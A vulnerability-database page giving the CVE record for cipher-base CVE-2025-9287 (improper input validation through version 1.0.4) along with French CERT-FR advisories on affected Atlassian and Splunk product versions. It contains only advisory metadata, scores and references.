Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-9287 (GCVE-0-2025-9287)
Vulnerability from cvelistv5 – Published: 2025-08-20 21:43 – Updated: 2025-11-03 18:14
VLAI?
EPSS
Title
Missing type checks leading to hash rewind and passing on crafted data
Summary
Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.
Severity ?
CWE
- CWE-20 - Improper Input Validation
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/browserify/cipher-base/securit… | vendor-advisory |
| https://github.com/browserify/cipher-base/pull/23 | patch |
Credits
https://github.com/ChALkeR
https://github.com/ChALkeR
https://github.com/ChALkeR
https://github.com/ljharb
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-9287",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-21T13:25:49.498638Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-21T14:48:11.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T18:14:17.043Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://npmjs.com/cipher-base",
"defaultStatus": "unaffected",
"packageName": "cipher-base",
"repo": "https://github.com/browserify/cipher-base",
"versions": [
{
"lessThanOrEqual": "1.0.4",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "https://github.com/ChALkeR"
},
{
"lang": "en",
"type": "finder",
"value": "https://github.com/ChALkeR"
},
{
"lang": "en",
"type": "remediation developer",
"value": "https://github.com/ChALkeR"
},
{
"lang": "en",
"type": "coordinator",
"value": "https://github.com/ljharb"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.\u003cp\u003eThis issue affects cipher-base: through 1.0.4.\u003c/p\u003e"
}
],
"value": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4."
}
],
"impacts": [
{
"capecId": "CAPEC-153",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-153 Input Data Manipulation"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-20T21:43:56.548Z",
"orgId": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"shortName": "harborist"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
},
{
"tags": [
"patch"
],
"url": "https://github.com/browserify/cipher-base/pull/23"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Missing type checks leading to hash rewind and passing on crafted data",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"assignerShortName": "harborist",
"cveId": "CVE-2025-9287",
"datePublished": "2025-08-20T21:43:56.548Z",
"dateReserved": "2025-08-20T21:38:26.339Z",
"dateUpdated": "2025-11-03T18:14:17.043Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-9287",
"date": "2026-05-20",
"epss": "0.00152",
"percentile": "0.35343"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-9287\",\"sourceIdentifier\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"published\":\"2025-08-20T22:15:30.557\",\"lastModified\":\"2025-11-03T19:16:17.187\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.\"},{\"lang\":\"es\",\"value\":\"La vulnerabilidad de validaci\u00f3n de entrada incorrecta en cipher-base permite la manipulaci\u00f3n de datos de entrada. Este problema afecta a cipher-base: hasta 1.0.4.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:browserify:cipher-base:*:*:*:*:*:node.js:*:*\",\"versionEndIncluding\":\"1.0.4\",\"matchCriteriaId\":\"485D8065-DEFF-404E-934D-DCA8E4C10860\"}]}]}],\"references\":[{\"url\":\"https://github.com/browserify/cipher-base/pull/23\",\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\",\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-9287\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-21T13:25:49.498638Z\"}}}], \"references\": [{\"url\": \"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-21T13:25:51.520Z\"}}], \"cna\": {\"title\": \"Missing type checks leading to hash rewind and passing on crafted data\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"reporter\", \"value\": \"https://github.com/ChALkeR\"}, {\"lang\": \"en\", \"type\": \"finder\", \"value\": \"https://github.com/ChALkeR\"}, {\"lang\": \"en\", \"type\": \"remediation developer\", \"value\": \"https://github.com/ChALkeR\"}, {\"lang\": \"en\", \"type\": \"coordinator\", \"value\": \"https://github.com/ljharb\"}], \"impacts\": [{\"capecId\": \"CAPEC-153\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-153 Input Data Manipulation\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 9.1, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/browserify/cipher-base\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"1.0.4\"}], \"packageName\": \"cipher-base\", \"collectionURL\": \"https://npmjs.com/cipher-base\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"https://github.com/browserify/cipher-base/pull/23\", \"tags\": [\"patch\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.\u003cp\u003eThis issue affects cipher-base: through 1.0.4.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20 Improper Input Validation\"}]}], \"providerMetadata\": {\"orgId\": \"7ffcee3d-2c14-4c3e-b844-86c6a321a158\", \"shortName\": \"harborist\", \"dateUpdated\": \"2025-08-20T21:43:56.548Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-9287\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-21T14:48:11.690Z\", \"dateReserved\": \"2025-08-20T21:38:26.339Z\", \"assignerOrgId\": \"7ffcee3d-2c14-4c3e-b844-86c6a321a158\", \"datePublished\": \"2025-08-20T21:43:56.548Z\", \"assignerShortName\": \"harborist\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
CERTFR-2026-AVI-0065
Vulnerability from certfr_avis - Published: 2026-01-21 - Updated: 2026-01-21
De multiples vulnérabilités ont été découvertes dans les produits Atlassian. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Atlassian | Jira | Jira Software Server versions 11.3.x antérieures à 11.3.0 | ||
| Atlassian | Confluence | Confluence Server versions antérieures à 8.5.31 | ||
| Atlassian | Jira | Jira Service Management Data Center versions antérieures à 5.12.29 | ||
| Atlassian | Jira | Jira Service Management Server versions 11.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Service Management Data Center versions 11.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Software Data Center versions 11.2.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Software Server versions 11.2.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Software Data Center versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Service Management Server versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Service Management Server versions 11.3.x antérieures à 11.3.0 | ||
| Atlassian | Confluence | Confluence Server versions 9.x antérieures à 9.2.13 | ||
| Atlassian | Confluence | Confluence Data Center versions 10.x antérieures à 10.2.2 | ||
| Atlassian | Jira | Jira Software Data Center versions antérieures à 9.12.26 | ||
| Atlassian | Jira | Jira Service Management Data Center versions 11.3.x antérieures à 11.3.1 | ||
| Atlassian | Confluence | Confluence Data Center versions antérieures à 8.5.31 | ||
| Atlassian | Jira | Jira Software Server versions antérieures à 9.12.26 | ||
| Atlassian | Confluence | Confluence Data Center versions 9.x antérieures à 9.2.13 | ||
| Atlassian | Jira | Jira Service Management Data Center versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Software Server versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Service Management Server versions antérieures à 5.12.29 | ||
| Atlassian | Jira | Jira Software Data Center versions 11.3.x antérieures à 11.3.0 |
References
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Jira Software Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Server versions ant\u00e9rieures \u00e0 8.5.31",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions ant\u00e9rieures \u00e0 5.12.29",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions 11.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions 11.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions 11.2.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Server versions 11.2.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Server versions 9.x ant\u00e9rieures \u00e0 9.2.13",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Data Center versions 10.x ant\u00e9rieures \u00e0 10.2.2",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions ant\u00e9rieures \u00e0 9.12.26",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Data Center versions ant\u00e9rieures \u00e0 8.5.31",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Server versions ant\u00e9rieures \u00e0 9.12.26",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Data Center versions 9.x ant\u00e9rieures \u00e0 9.2.13",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Server versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions ant\u00e9rieures \u00e0 5.12.29",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"name": "CVE-2025-49146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49146"
},
{
"name": "CVE-2022-25883",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25883"
},
{
"name": "CVE-2025-66516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66516"
},
{
"name": "CVE-2025-15284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15284"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2021-3807",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3807"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2022-45693",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45693"
},
{
"name": "CVE-2025-54988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54988"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2025-53689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53689"
}
],
"initial_release_date": "2026-01-21T00:00:00",
"last_revision_date": "2026-01-21T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0065",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-01-21T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Atlassian. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Atlassian",
"vendor_advisories": [
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26667",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26667"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16497",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16497"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16496",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16496"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101827",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101827"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26665",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26665"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16485",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16485"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26661",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26661"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16491",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16491"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101878",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101878"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16501",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16501"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26663",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26663"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16503",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16503"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26662",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26662"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16459",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16459"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26654",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26654"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26656",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26656"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101872",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101872"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16502",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16502"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101842",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101842"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16499",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16499"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16465",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16465"
}
]
}
CERTFR-2026-AVI-0118
Vulnerability from certfr_avis - Published: 2026-02-05 - Updated: 2026-02-05
De multiples vulnérabilités ont été découvertes dans les produits Splunk. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Splunk SOAR versions ant\u00e9rieures \u00e0 7.1.0",
"product": {
"name": "SOAR",
"vendor": {
"name": "Splunk",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2025-32873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32873"
},
{
"name": "CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"name": "CVE-2025-57810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57810"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2025-47287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47287"
}
],
"initial_release_date": "2026-02-05T00:00:00",
"last_revision_date": "2026-02-05T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0118",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-05T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Splunk. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Splunk",
"vendor_advisories": [
{
"published_at": "2026-02-04",
"title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0201",
"url": "https://advisory.splunk.com/advisories/SVD-2026-0201"
}
]
}
CERTFR-2026-AVI-0065
Vulnerability from certfr_avis - Published: 2026-01-21 - Updated: 2026-01-21
